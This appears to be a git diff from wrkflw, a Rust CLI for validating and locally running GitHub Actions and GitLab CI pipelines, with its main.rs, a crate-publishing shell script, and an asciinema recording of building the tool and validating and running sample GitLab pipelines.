||||
#[arg(short, long)]
|
||||
branch: Option<String>,
|
||||
|
||||
/// Key-value inputs for the workflow in format key=value
|
||||
#[arg(short, long, value_parser = parse_key_val)]
|
||||
input: Option<Vec<(String, String)>>,
|
||||
},
|
||||
|
||||
/// Trigger a GitLab pipeline remotely
|
||||
TriggerGitlab {
|
||||
/// Branch to run the pipeline on
|
||||
#[arg(short, long)]
|
||||
branch: Option<String>,
|
||||
|
||||
/// Key-value variables for the pipeline in format key=value
|
||||
#[arg(short = 'V', long, value_parser = parse_key_val)]
|
||||
variable: Option<Vec<(String, String)>>,
|
||||
},
|
||||
|
||||
/// List available workflows and pipelines
|
||||
List,
|
||||
}
|
||||
|
||||
// Parser function for key-value pairs
|
||||
fn parse_key_val(s: &str) -> Result<(String, String), String> {
|
||||
let pos = s
|
||||
.find('=')
|
||||
.ok_or_else(|| format!("invalid KEY=value: no `=` found in `{}`", s))?;
|
||||
|
||||
Ok((s[..pos].to_string(), s[pos + 1..].to_string()))
|
||||
}

// Cleanup on exit calls wrkflw_executor and wrkflw_runtime cleanup directly;
// if this needs to be unit-tested later it could move into a shared cleanup module.
async fn cleanup_on_exit() {
    // Clean up Docker resources if available, but don't let it block indefinitely
    match tokio::time::timeout(std::time::Duration::from_secs(3), async {
        match Docker::connect_with_local_defaults() {
            Ok(docker) => {
                // Assuming cleanup_resources exists in executor crate
                wrkflw_executor::cleanup_resources(&docker).await;
            }
            Err(_) => {
                // Docker not available
                wrkflw_logging::info("Docker not available, skipping Docker cleanup");
            }
        }
    })
    .await
    {
        Ok(_) => wrkflw_logging::debug("Docker cleanup completed successfully"),
        Err(_) => wrkflw_logging::warning(
            "Docker cleanup timed out after 3 seconds, continuing with shutdown",
        ),
    }

    // Always clean up emulation resources
    match tokio::time::timeout(
        std::time::Duration::from_secs(2),
        // Assuming cleanup_resources exists in wrkflw_runtime::emulation module
        wrkflw_runtime::emulation::cleanup_resources(),
    )
    .await
    {
        Ok(_) => wrkflw_logging::debug("Emulation cleanup completed successfully"),
        Err(_) => wrkflw_logging::warning("Emulation cleanup timed out, continuing with shutdown"),
    }

    wrkflw_logging::info("Resource cleanup completed");
}

async fn handle_signals() {
    // Set up a hard exit timer in case cleanup takes too long
    // This ensures the app always exits even if Docker operations are stuck
    let hard_exit_time = std::time::Duration::from_secs(10);

    // Wait for Ctrl+C
    match tokio::signal::ctrl_c().await {
        Ok(_) => {
            println!("Received Ctrl+C, shutting down and cleaning up...");
        }
        Err(e) => {
            // Log the error but continue with cleanup
            eprintln!("Warning: Failed to properly listen for ctrl+c event: {}", e);
            println!("Shutting down and cleaning up...");
        }
    }

    // Set up a watchdog thread that will force exit if cleanup takes too long
    // This is important because Docker operations can sometimes hang indefinitely
    let _ = std::thread::spawn(move || {
        std::thread::sleep(hard_exit_time);
        eprintln!(
            "Cleanup taking too long (over {} seconds), forcing exit...",
            hard_exit_time.as_secs()
        );
        wrkflw_logging::error("Forced exit due to cleanup timeout");
        std::process::exit(1);
    });

    // Clean up containers
    cleanup_on_exit().await;

    // Exit with success status - the force exit thread will be terminated automatically
    std::process::exit(0);
}

/// Determines if a file is a GitLab CI/CD pipeline based on its name and content
fn is_gitlab_pipeline(path: &Path) -> bool {
    // First check the file name
    if let Some(file_name) = path.file_name() {
        if let Some(file_name_str) = file_name.to_str() {
            if file_name_str == ".gitlab-ci.yml" || file_name_str.ends_with("gitlab-ci.yml") {
                return true;
            }
        }
    }

    // Check if file is in .gitlab/ci directory
    if let Some(parent) = path.parent() {
        if let Some(parent_str) = parent.to_str() {
            if parent_str.ends_with(".gitlab/ci")
                && path
                    .extension()
                    .is_some_and(|ext| ext == "yml" || ext == "yaml")
            {
                return true;
            }
        }
    }

    // If file exists, check the content
    if path.exists() {
        if let Ok(content) = std::fs::read_to_string(path) {
            // GitLab CI/CD pipelines typically have stages, before_script, after_script at the top level
            if content.contains("stages:")
                || content.contains("before_script:")
                || content.contains("after_script:")
            {
                // Check for GitHub Actions specific keys that would indicate it's not GitLab
                if !content.contains("on:")
                    && !content.contains("runs-on:")
                    && !content.contains("uses:")
                {
                    return true;
                }
            }
        }
    }

    false
}
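
// A small test sketch for the filename-based branch of is_gitlab_pipeline (illustrative
// addition, not part of the original file); the paths are hypothetical and the
// content-based branch is not exercised here because it reads from disk.
#[cfg(test)]
mod gitlab_detection_tests {
    use super::is_gitlab_pipeline;
    use std::path::Path;

    #[test]
    fn detects_pipelines_by_file_name() {
        assert!(is_gitlab_pipeline(Path::new(".gitlab-ci.yml")));
        assert!(is_gitlab_pipeline(Path::new("ci/my.gitlab-ci.yml")));
    }

    #[test]
    fn ignores_other_yaml_files() {
        // A path that does not exist and does not match the GitLab naming rules.
        assert!(!is_gitlab_pipeline(Path::new("does-not-exist/plain.yml")));
    }
}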

#[tokio::main]
async fn main() {
    // Gracefully handle Broken pipe (EPIPE) when output is piped (e.g., to `head`)
    let default_panic_hook = std::panic::take_hook();
    std::panic::set_hook(Box::new(move |info| {
        let mut is_broken_pipe = false;
        if let Some(s) = info.payload().downcast_ref::<&str>() {
            if s.contains("Broken pipe") {
                is_broken_pipe = true;
            }
        }
        if let Some(s) = info.payload().downcast_ref::<String>() {
            if s.contains("Broken pipe") {
                is_broken_pipe = true;
            }
        }
        if is_broken_pipe {
            // Treat as a successful, short-circuited exit
            std::process::exit(0);
        }
        // Fall back to the default hook for all other panics
        default_panic_hook(info);
    }));

    let cli = Wrkflw::parse();
    let verbose = cli.verbose;
    let debug = cli.debug;

    // Set log level based on command line flags
    if debug {
        wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Debug);
        wrkflw_logging::debug("Debug mode enabled - showing detailed logs");
    } else if verbose {
        wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Info);
        wrkflw_logging::info("Verbose mode enabled");
    } else {
        wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Warning);
    }

    // Set up a Ctrl+C handler that runs in the background
    tokio::spawn(handle_signals());

    match &cli.command {
        Some(Commands::Validate {
            paths,
            gitlab,
            exit_code,
            no_exit_code,
        }) => {
            // Determine the paths to validate (default to .github/workflows when none provided)
            let validate_paths: Vec<PathBuf> = if paths.is_empty() {
                vec![PathBuf::from(".github/workflows")]
            } else {
                paths.clone()
            };

            // Determine if we're validating a GitLab pipeline based on the --gitlab flag or file detection
            let force_gitlab = *gitlab;
            let mut validation_failed = false;

            for validate_path in validate_paths {
                // Check if the path exists; if not, mark failure but continue
                if !validate_path.exists() {
                    eprintln!("Error: Path does not exist: {}", validate_path.display());
                    validation_failed = true;
                    continue;
                }

                if validate_path.is_dir() {
                    // Validate all workflow files in the directory
                    let entries = std::fs::read_dir(&validate_path)
                        .expect("Failed to read directory")
                        .filter_map(|entry| entry.ok())
                        .filter(|entry| {
                            entry.path().is_file()
                                && entry
                                    .path()
                                    .extension()
                                    .is_some_and(|ext| ext == "yml" || ext == "yaml")
                        })
                        .collect::<Vec<_>>();

                    println!(
                        "Validating {} workflow file(s) in {}...",
                        entries.len(),
                        validate_path.display()
                    );

                    for entry in entries {
                        let path = entry.path();
                        let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);

                        let file_failed = if is_gitlab {
                            validate_gitlab_pipeline(&path, verbose)
                        } else {
                            validate_github_workflow(&path, verbose)
                        };

                        if file_failed {
                            validation_failed = true;
                        }
                    }
                } else {
                    // Validate a single workflow file
                    let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);

                    let file_failed = if is_gitlab {
                        validate_gitlab_pipeline(&validate_path, verbose)
                    } else {
                        validate_github_workflow(&validate_path, verbose)
                    };

                    if file_failed {
                        validation_failed = true;
                    }
                }
            }

            // Set exit code if validation failed and exit_code flag is true (and no_exit_code is false)
            if validation_failed && *exit_code && !*no_exit_code {
                std::process::exit(1);
            }
        }
        Some(Commands::Run {
            path,
            runtime,
            show_action_messages: _,
            preserve_containers_on_failure,
            gitlab,
        }) => {
            // Create execution configuration
            let config = wrkflw_executor::ExecutionConfig {
                runtime_type: runtime.clone().into(),
                verbose,
                preserve_containers_on_failure: *preserve_containers_on_failure,
            };

            // Check if we're explicitly or implicitly running a GitLab pipeline
            let is_gitlab = *gitlab || is_gitlab_pipeline(path);
            let workflow_type = if is_gitlab {
                "GitLab CI pipeline"
            } else {
                "GitHub workflow"
            };

            wrkflw_logging::info(&format!("Running {} at: {}", workflow_type, path.display()));

            // Execute the workflow
            let result = wrkflw_executor::execute_workflow(path, config)
                .await
                .unwrap_or_else(|e| {
                    eprintln!("Error executing workflow: {}", e);
                    std::process::exit(1);
                });

            // Print execution summary
            if result.failure_details.is_some() {
                eprintln!("❌ Workflow execution failed:");
                if let Some(details) = result.failure_details {
                    if verbose {
                        // Show full error details in verbose mode
                        eprintln!("{}", details);
                    } else {
                        // Show simplified error info in non-verbose mode
                        let simplified_error = details
                            .lines()
                            .filter(|line| line.contains("❌") || line.trim().starts_with("Error:"))
                            .take(5) // Limit to the first 5 error lines
                            .collect::<Vec<&str>>()
                            .join("\n");

                        eprintln!("{}", simplified_error);

                        if details.lines().count() > 5 {
                            eprintln!("\nUse --verbose flag to see full error details");
                        }
                    }
                }
                std::process::exit(1);
            } else {
                println!("✅ Workflow execution completed successfully!");

                // Print a summary of executed jobs (always shown)
                println!("\nJob summary:");
                for job in result.jobs {
                    println!(
                        " {} {} ({})",
                        match job.status {
                            wrkflw_executor::JobStatus::Success => "✅",
                            wrkflw_executor::JobStatus::Failure => "❌",
                            wrkflw_executor::JobStatus::Skipped => "⏭️",
                        },
                        job.name,
                        match job.status {
                            wrkflw_executor::JobStatus::Success => "success",
                            wrkflw_executor::JobStatus::Failure => "failure",
                            wrkflw_executor::JobStatus::Skipped => "skipped",
                        }
                    );

                    // Always show steps, not just in debug mode
                    println!(" Steps:");
                    for step in job.steps {
                        let step_status = match step.status {
                            wrkflw_executor::StepStatus::Success => "✅",
                            wrkflw_executor::StepStatus::Failure => "❌",
                            wrkflw_executor::StepStatus::Skipped => "⏭️",
                        };

                        println!(" {} {}", step_status, step.name);

                        // If step failed and we're not in verbose mode, show condensed error info
                        if step.status == wrkflw_executor::StepStatus::Failure && !verbose {
                            // Extract error information from step output
                            let error_lines = step
                                .output
                                .lines()
                                .filter(|line| {
                                    line.contains("error:")
                                        || line.contains("Error:")
                                        || line.trim().starts_with("Exit code:")
                                        || line.contains("failed")
                                })
                                .take(3) // Limit to 3 most relevant error lines
                                .collect::<Vec<&str>>();

                            if !error_lines.is_empty() {
                                println!(" Error details:");
                                for line in error_lines {
                                    println!(" {}", line.trim());
                                }

                                if step.output.lines().count() > 3 {
                                    println!(" (Use --verbose for full output)");
                                }
                            }
                        }
                    }
                }
            }

            // Cleanup is handled automatically via the signal handler
        }
        Some(Commands::TriggerGitlab { branch, variable }) => {
            // Convert optional Vec<(String, String)> to Option<HashMap<String, String>>
            let variables = variable
                .as_ref()
                .map(|v| v.iter().cloned().collect::<HashMap<String, String>>());

            // Trigger the pipeline
            if let Err(e) = wrkflw_gitlab::trigger_pipeline(branch.as_deref(), variables).await {
                eprintln!("Error triggering GitLab pipeline: {}", e);
                std::process::exit(1);
            }
        }
        Some(Commands::Tui {
            path,
            runtime,
            show_action_messages: _,
            preserve_containers_on_failure,
        }) => {
            // Set runtime type based on the runtime choice
            let runtime_type = runtime.clone().into();

            // Call the TUI implementation from the ui crate
            if let Err(e) = wrkflw_ui::run_wrkflw_tui(
                path.as_ref(),
                runtime_type,
                verbose,
                *preserve_containers_on_failure,
            )
            .await
            {
                eprintln!("Error running TUI: {}", e);
                std::process::exit(1);
            }
        }
        Some(Commands::Trigger {
            workflow,
            branch,
            input,
        }) => {
            // Convert optional Vec<(String, String)> to Option<HashMap<String, String>>
            let inputs = input
                .as_ref()
                .map(|i| i.iter().cloned().collect::<HashMap<String, String>>());

            // Trigger the workflow
            if let Err(e) =
                wrkflw_github::trigger_workflow(workflow, branch.as_deref(), inputs).await
            {
                eprintln!("Error triggering GitHub workflow: {}", e);
                std::process::exit(1);
            }
        }
        Some(Commands::List) => {
            list_workflows_and_pipelines(verbose);
        }
        None => {
            // Launch TUI by default when no command is provided
            let runtime_type = wrkflw_executor::RuntimeType::Docker;

            // Call the TUI implementation from the ui crate with default path
            if let Err(e) = wrkflw_ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
                eprintln!("Error running TUI: {}", e);
                std::process::exit(1);
            }
        }
    }
}

/// Validate a GitHub workflow file
/// Returns true if validation failed, false if it passed
fn validate_github_workflow(path: &Path, verbose: bool) -> bool {
    print!("Validating GitHub workflow file: {}... ", path.display());

    // Use the ui crate's validate_workflow function
    match wrkflw_ui::validate_workflow(path, verbose) {
        Ok(_) => {
            // The detailed validation output is already printed by the function
            // We need to check if there were validation issues
            // Since wrkflw_ui::validate_workflow doesn't return the validation result directly,
            // we need to call the evaluator directly to get the result
            match wrkflw_evaluator::evaluate_workflow_file(path, verbose) {
                Ok(result) => !result.is_valid,
                Err(_) => true, // Parse errors count as validation failure
            }
        }
        Err(e) => {
            eprintln!("Error validating workflow: {}", e);
            true // Any error counts as validation failure
        }
    }
}

/// Validate a GitLab CI/CD pipeline file
/// Returns true if validation failed, false if it passed
fn validate_gitlab_pipeline(path: &Path, verbose: bool) -> bool {
    print!("Validating GitLab CI pipeline file: {}... ", path.display());

    // Parse and validate the pipeline file
    match wrkflw_parser::gitlab::parse_pipeline(path) {
        Ok(pipeline) => {
            println!("✅ Valid syntax");

            // Additional structural validation
            let validation_result = wrkflw_validators::validate_gitlab_pipeline(&pipeline);

            if !validation_result.is_valid {
                println!("⚠️ Validation issues:");
                for issue in validation_result.issues {
                    println!(" - {}", issue);
                }
                true // Validation failed
            } else {
                if verbose {
                    println!("✅ All validation checks passed");
                }
                false // Validation passed
            }
        }
        Err(e) => {
            println!("❌ Invalid");
            eprintln!("Validation failed: {}", e);
            true // Parse error counts as validation failure
        }
    }
}

/// List available workflows and pipelines in the repository
fn list_workflows_and_pipelines(verbose: bool) {
    // Check for GitHub workflows
    let github_path = PathBuf::from(".github/workflows");
    if github_path.exists() && github_path.is_dir() {
        println!("GitHub Workflows:");

        let entries = std::fs::read_dir(&github_path)
            .expect("Failed to read directory")
            .filter_map(|entry| entry.ok())
            .filter(|entry| {
                entry.path().is_file()
                    && entry
                        .path()
                        .extension()
                        .is_some_and(|ext| ext == "yml" || ext == "yaml")
            })
            .collect::<Vec<_>>();

        if entries.is_empty() {
            println!(" No workflow files found in .github/workflows");
        } else {
            for entry in entries {
                println!(" - {}", entry.path().display());
            }
        }
    } else {
        println!("GitHub Workflows: No .github/workflows directory found");
    }

    // Check for GitLab CI pipeline
    let gitlab_path = PathBuf::from(".gitlab-ci.yml");
    if gitlab_path.exists() && gitlab_path.is_file() {
        println!("GitLab CI Pipeline:");
        println!(" - {}", gitlab_path.display());
    } else {
        println!("GitLab CI Pipeline: No .gitlab-ci.yml file found");
    }

    // Check for other GitLab CI pipeline files
    if verbose {
        println!("Searching for other GitLab CI pipeline files...");

        let entries = walkdir::WalkDir::new(".")
            .follow_links(true)
            .into_iter()
            .filter_map(|entry| entry.ok())
            .filter(|entry| {
                entry.path().is_file()
                    && entry
                        .file_name()
                        .to_string_lossy()
                        .ends_with("gitlab-ci.yml")
                    && entry.path() != gitlab_path
            })
            .collect::<Vec<_>>();

        if !entries.is_empty() {
            println!("Additional GitLab CI Pipeline files:");
            for entry in entries {
                println!(" - {}", entry.path().display());
            }
        }
    }
}
179
publish_crates.sh
Executable file
@@ -0,0 +1,179 @@
#!/bin/bash

# Enhanced script to manage versions and publish all wrkflw crates using cargo-workspaces

set -e

# Parse command line arguments
COMMAND=${1:-""}
VERSION_TYPE=${2:-""}
DRY_RUN=""

show_help() {
    echo "Usage: $0 <command> [options]"
    echo ""
    echo "Commands:"
    echo " version <type> Update versions across workspace"
    echo " Types: patch, minor, major"
    echo " publish Publish all crates to crates.io"
    echo " release <type> Update versions and publish (combines version + publish)"
    echo " help Show this help message"
    echo ""
    echo "Options:"
    echo " --dry-run Test without making changes (for publish/release)"
    echo ""
    echo "Examples:"
    echo " $0 version minor # Bump to 0.7.0"
    echo " $0 publish --dry-run # Test publishing"
    echo " $0 release minor --dry-run # Test version bump + publish"
    echo " $0 release patch # Release patch version"
}

# Parse dry-run flag from any position
for arg in "$@"; do
    if [[ "$arg" == "--dry-run" ]]; then
        DRY_RUN="--dry-run"
    fi
done

case "$COMMAND" in
    "help"|"-h"|"--help"|"")
        show_help
        exit 0
        ;;
    "version")
        if [[ -z "$VERSION_TYPE" ]]; then
            echo "❌ Error: Version type required (patch, minor, major)"
            echo ""
            show_help
            exit 1
        fi
        ;;
    "publish")
        # publish command doesn't need version type
        ;;
    "release")
        if [[ -z "$VERSION_TYPE" ]]; then
            echo "❌ Error: Version type required for release (patch, minor, major)"
            echo ""
            show_help
            exit 1
        fi
        ;;
    *)
        echo "❌ Error: Unknown command '$COMMAND'"
        echo ""
        show_help
        exit 1
        ;;
esac

# Check if cargo-workspaces is installed
if ! command -v cargo-workspaces &> /dev/null; then
    echo "❌ cargo-workspaces not found. Installing..."
    cargo install cargo-workspaces
fi

# Check if we're logged in to crates.io (only for publish operations)
if [[ "$COMMAND" == "publish" ]] || [[ "$COMMAND" == "release" ]]; then
    if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
        echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
        exit 1
    fi
fi

# Function to update versions
update_versions() {
    local version_type=$1
    echo "🔄 Updating workspace versions ($version_type)..."

    if [[ "$DRY_RUN" == "--dry-run" ]]; then
        echo "🧪 DRY RUN: Simulating version update"
        echo ""
        echo "Current workspace version: $(grep '^version =' Cargo.toml | cut -d'"' -f2)"
        echo "Would execute: cargo workspaces version $version_type"
        echo ""
        echo "This would update all crates and their internal dependencies."
        echo "✅ Version update simulation completed (no changes made)"
    else
        cargo workspaces version "$version_type"
        echo "✅ Versions updated successfully"
    fi
}

# Function to test build
test_build() {
    echo "🔨 Testing workspace build..."
    if cargo build --workspace; then
        echo "✅ Workspace builds successfully"
    else
        echo "❌ Build failed. Please fix errors before publishing."
        exit 1
    fi
}

# Function to publish crates
publish_crates() {
    echo "📦 Publishing crates to crates.io..."

    if [[ "$DRY_RUN" == "--dry-run" ]]; then
        echo "🧪 DRY RUN: Testing publication"
        cargo workspaces publish --dry-run
        echo "✅ All crates passed dry-run tests!"
        echo ""
        echo "To actually publish, run:"
        echo " $0 publish"
    else
        cargo workspaces publish
        echo "🎉 All crates published successfully!"
        echo ""
        echo "Users can now install wrkflw with:"
        echo " cargo install wrkflw"
    fi
}

# Function to show changelog info
show_changelog_info() {
    echo "📝 Changelog will be generated automatically by GitHub Actions workflow"
}

# Execute commands based on the operation
case "$COMMAND" in
    "version")
        update_versions "$VERSION_TYPE"
        show_changelog_info
        ;;
    "publish")
        test_build
        publish_crates
        ;;
    "release")
        echo "🚀 Starting release process..."
        echo ""

        # Step 1: Update versions
        update_versions "$VERSION_TYPE"

        # Step 2: Test build
        test_build

        # Step 3: Show changelog info
        show_changelog_info

        # Step 4: Publish (if not dry-run)
        if [[ "$DRY_RUN" != "--dry-run" ]]; then
            echo ""
            read -p "🤔 Continue with publishing? (y/N): " -n 1 -r
            echo
            if [[ $REPLY =~ ^[Yy]$ ]]; then
                publish_crates
            else
                echo "⏸️ Publishing cancelled. To publish later, run:"
                echo " $0 publish"
            fi
        else
            echo ""
            publish_crates
        fi
        ;;
esac
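
# Example invocations (illustrative only, using the commands defined above):
#   ./publish_crates.sh release minor --dry-run   # simulate a minor version bump and publication
#   ./publish_crates.sh publish                   # build the workspace, then publish every crate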
774
red.cast
Normal file
@@ -0,0 +1,774 @@
[red.cast is an asciinema v2 terminal recording (245x61, zsh) demonstrating wrkflw: the session cats test_gitlab_ci/minimal.gitlab-ci.yml (a minimal pipeline defining build and test jobs on image rust:latest) and then runs `cargo r validate test_gitlab_ci/minimal.gitlab-ci.yml`, which compiles the workspace before validating. The raw escape-sequence frames are not reproduced in this excerpt.]
|
||||
[23.173471, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m httpdate v1.0.3\r\n"]
|
||||
[23.173495, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 73/270: rustix(build), icu_properties_data(build), getrandom(build), syn, percent-encoding, httpdate, num-traits, thiserror(build), httparse(build), http-body, icu_normalizer_data(build), unsafe-lib...\r"]
|
||||
[23.212014, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m tower-service v0.3.3\r\n"]
|
||||
[23.212044, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======> ] 74/270: rustix(build), icu_properties_data(build), getrandom(build), syn, percent-encoding, httpdate, num-traits, tower-service, thiserror(build), httparse(build), icu_normalizer_data(build), unsafe...\r"]
|
||||
[23.244991, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m native-tls v0.2.14\r\n"]
|
||||
[asciinema recording frames: cargo build progress for the wrkflw workspace, compiling 270 crates (external dependencies plus the local models, matrix, logging, utils, runtime, validators, evaluator, github, gitlab, parser, executor, ui, and wrkflw crates); finished the dev profile (unoptimized + debuginfo) build in 16.45s]
[36.946554, "o", "\u001b[1m\u001b[32m Running\u001b[0m `target/debug/wrkflw validate test_gitlab_ci/minimal.gitlab-ci.yml`\r\n"]
|
||||
[37.469642, "o", "Validating GitLab CI pipeline file: test_gitlab_ci/minimal.gitlab-ci.yml... ✅ Valid syntax\r\n"]
|
||||
[37.470535, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[37.471315, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[37.471326, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[37.473048, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[37.47485, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[37.474976, "o", "\u001b[?1h\u001b="]
|
||||
[37.475042, "o", "\u001b[?2004h"]
|
||||
[39.504083, "o", "c"]
|
||||
[39.575281, "o", "\bca"]
|
||||
[39.985807, "o", "r"]
|
||||
[40.110435, "o", "g"]
|
||||
[40.247171, "o", "o"]
|
||||
[40.366603, "o", " "]
|
||||
[40.491496, "o", "r"]
|
||||
[41.167474, "o", "\b \b"]
|
||||
[41.318578, "o", "\b"]
|
||||
[41.464227, "o", "\b \b"]
|
||||
[41.588577, "o", "\b \b"]
|
||||
[41.725879, "o", "\b \b"]
|
||||
[41.849987, "o", "\b\bc \b"]
|
||||
[42.776052, "o", "\bcl"]
|
||||
[42.880903, "o", "e"]
|
||||
[43.132681, "o", "a"]
|
||||
[43.245463, "o", "r"]
|
||||
[43.601618, "o", "\u001b[?1l\u001b>"]
|
||||
[43.601729, "o", "\u001b[?2004l\r\r\n"]
|
||||
[43.603201, "o", "\u001b]2;clear\u0007\u001b]1;clear\u0007"]
|
||||
[43.630852, "o", "\u001b[3J\u001b[H\u001b[2J"]
|
||||
[43.631162, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[43.632238, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[43.632263, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[43.635069, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[43.637553, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[43.637652, "o", "\u001b[?1h\u001b="]
|
||||
[43.637664, "o", "\u001b[?2004h"]
|
||||
[43.991397, "o", "c"]
|
||||
[44.088651, "o", "\bca"]
|
||||
[44.374368, "o", "r"]
|
||||
[44.446833, "o", "g"]
|
||||
[44.53755, "o", "o"]
|
||||
[44.628977, "o", " "]
|
||||
[44.812984, "o", "r"]
|
||||
[44.922289, "o", " "]
|
||||
[46.356703, "o", "-"]
|
||||
[46.687628, "o", "-"]
|
||||
[47.264144, "o", " "]
|
||||
[47.638826, "o", "r"]
|
||||
[47.824999, "o", "u"]
|
||||
[48.00395, "o", "n"]
|
||||
[48.099902, "o", " "]
|
||||
[50.32697, "o", "t"]
|
||||
[50.449608, "o", "e"]
|
||||
[50.661865, "o", "s"]
|
||||
[50.768766, "o", "t"]
|
||||
[51.489835, "o", "_"]
|
||||
[51.868906, "o", "g"]
|
||||
[51.965985, "o", "itlab_ci\u001b[1m/\u001b[0m"]
|
||||
[53.657521, "o", "\b\u001b[0m/m"]
|
||||
[53.813699, "o", "i"]
|
||||
[53.937831, "o", "nimal.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[55.072612, "o", "\b\u001b[0m -"]
|
||||
[55.326911, "o", "e"]
|
||||
[56.520262, "o", "\u001b[?1l\u001b>"]
|
||||
[56.520344, "o", "\u001b[?2004l\r\r\n"]
|
||||
[56.521995, "o", "\u001b]2;cargo r -- run test_gitlab_ci/minimal.gitlab-ci.yml -e\u0007\u001b]1;cargo\u0007"]
|
||||
[56.760823, "o", "\u001b[1m\u001b[32m Finished\u001b[0m `dev` profile [unoptimized + debuginfo] target(s) in 0.19s\r\n"]
|
||||
[56.766792, "o", "\u001b[1m\u001b[32m Running\u001b[0m `target/debug/wrkflw run test_gitlab_ci/minimal.gitlab-ci.yml -e`\r\n"]
|
||||
[63.060648, "o", "✅ Workflow execution completed successfully!\r\n\r\nJob summary:\r\n ✅ build (success)\r\n Steps:\r\n ✅ Run script line 1\r\n ✅ test (success)\r\n Steps:\r\n ✅ Run script line 1\r\n ✅ build (success)\r\n Steps:\r\n ✅ Run script line 1\r\n ✅ test (success)\r\n Steps:\r\n ✅ Run script line 1\r\n"]
|
||||
[63.062528, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[63.063152, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[63.063163, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[63.064999, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[63.06677, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[63.066845, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
|
||||
[66.121168, "o", "c"]
|
||||
[66.234389, "o", "\bca"]
|
||||
[66.398021, "o", "t"]
|
||||
[66.595798, "o", " "]
|
||||
[67.93179, "o", "t"]
|
||||
[68.057573, "o", "e"]
|
||||
[68.252993, "o", "s"]
|
||||
[68.380648, "o", "t"]
|
||||
[68.977726, "o", "_"]
|
||||
[69.395102, "o", "g"]
|
||||
[69.506881, "o", "itlab_ci\u001b[1m/\u001b[0m"]
|
||||
[72.095324, "o", "\b\u001b[0m/i"]
|
||||
[72.270688, "o", "n"]
|
||||
[72.41996, "o", "\u0007\r\r\n"]
|
||||
[72.420018, "o", "\u001b[J\u001b[0mincludes.gitlab-ci.yml \u001b[Jinvalid.gitlab-ci.yml \u001b[J\u001b[A\u001b[0m\u001b[27m\u001b[24m\r\u001b[19Ccat test_gitlab_ci/in\u001b[K"]
|
||||
[73.498026, "o", "v"]
|
||||
[73.636495, "o", "alid.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[75.147715, "o", "\b\u001b[0m \b"]
|
||||
[75.148084, "o", "\u001b[?1l\u001b>\u001b[?2004l\r\r\n\u001b[J"]
|
||||
[75.149613, "o", "\u001b]2;cat test_gitlab_ci/invalid.gitlab-ci.yml\u0007\u001b]1;cat\u0007"]
|
||||
[75.175256, "o", "# Invalid GitLab CI file with common mistakes\r\n\r\n# Missing stages definition\r\n# stages:\r\n# - build\r\n# - test\r\n\r\nvariables:\r\n CARGO_HOME: ${CI_PROJECT_DIR}/.cargo # Missing quotes around value with variables\r\n\r\n# Invalid job definition (missing script)\r\nbuild:\r\n stage: build # Referring to undefined stage\r\n # Missing required script section\r\n artifacts:\r\n paths:\r\n - target/release/\r\n expire_in: 1 week\r\n\r\n# Invalid job with incorrect when value\r\ntest:\r\n stage: test\r\n script:\r\n - cargo test\r\n when: never # Invalid value for when (should be always, manual, or delayed)\r\n dependencies:\r\n - non_existent_job # Dependency on non-existent job\r\n\r\n# Improperly structured job with invalid keys\r\ndeploy:\r\n stagee: deploy # Typo in stage key\r\n scriptt: # Typo in script key\r\n - echo \"Deploying...\"\r\n only:\r\n - main\r\n environment:\r\n production # Incorrect format for environment\r\n retry: hello # Incorrect type for retry (should be integer or object)\r\n\r\n# Invalid rules section\r\nl"]
|
||||
[75.175425, "o", "int:\r\n stage: test\r\n script:\r\n - cargo clippy\r\n rules:\r\n - equals: $CI_COMMIT_BRANCH == \"main\" # Invalid rule (should be if, changes, exists, etc.)\r\n \r\n# Job with invalid cache configuration\r\ncache-test:\r\n stage: test\r\n script:\r\n - echo \"Testing cache\"\r\n cache:\r\n paths:\r\n - ${CARGO_HOME}\r\n key: [invalid, key, type] # Invalid type for key (should be string)\r\n policy: invalid-policy # Invalid policy value "]
|
||||
